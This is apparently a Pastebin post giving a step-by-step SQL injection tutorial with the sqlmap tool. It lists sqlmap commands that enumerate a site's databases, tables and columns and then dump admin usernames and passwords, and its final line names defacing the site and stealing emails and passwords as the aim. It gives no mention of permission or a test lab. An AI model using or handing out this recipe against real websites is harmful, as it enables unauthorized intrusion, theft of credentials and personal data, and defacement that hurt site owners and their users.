Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Author: Irishsec
- ------------------------------------------------------------------------------------------------------------------------
- Structured query language injection (SQLI) with sqlmap tutorial.
- For this all you need is sqlmap which is for both windows and linux operating systems. https://github.com/sqlmapproject/sqlmap
- open sqlmap from the terminal and navigate to the directory.
- python sqlmap.py -u website.com/index.php?id=1 --dbs
- this command will give you the databases and names
- python sqlmap.py -u website.com/index.php?id=1 -D databasename --tables
- This command will list all the tables in the database.
- These tables will contain information such as usernames passwords and personal information
- Look for a table called something of such as "users or admin"
- python sqlmap.py -u website.com/index.php?id=1 -D databasename -T admin --columns
- This command ill show the columns within the table
- python sqlmap.py -u website.com/index.php?id=1 -D databasename -T admin -C username,password --dump
- This command will give you the username and password for the website and you will be able to deface and dump emails and passwords.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement